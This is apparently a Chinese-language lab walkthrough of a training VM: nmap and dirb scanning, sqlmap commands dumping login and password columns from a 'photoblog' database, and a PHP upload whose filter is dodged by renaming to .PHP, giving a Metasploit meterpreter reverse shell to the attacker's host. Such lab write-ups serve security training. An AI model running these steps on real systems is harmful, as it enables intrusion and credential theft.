主机:192.168.136.133
靶机:192.168.136.143
用nmap、dirb扫描靶机
发现有一个网址http://192.168.136.143/admin登陆进去,发现有登陆页面
试用常规的弱口令进行测试发现都不行,转换思路,看看有没有其他漏洞可入侵
用owasp-zap扫描
发现有sql注入
利用sqlmap -u http://192.168.136.143/cat.php?id=3 –dbs
有两个数据库
再用sqlmap -u http://192.168.136.143/cat.php?id=3 -D information_schema –tables查看一下information_schema,表太多,直接看下一个有什么。
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog –tables
看到有users的表,可能存在登陆账户和密码
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog -T users –columns
查看login和password
sqlmap -u http://192.168.136.143/cat.php?id=3 -D photoblog -T users -C “login,password” –dump
看到了登陆账号和密码,返回登陆页面。登陆进去,在new picture选项发现有可上传选项
接下来构造shell并写一个php文本上传
用msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.136.133
开始run监听
上传发现出现这个页面
可能被防火墙过滤,改.PHP
反弹shell成功
web靶机系列-GET参数注入
最新推荐文章于 2024-05-14 16:37:00 发布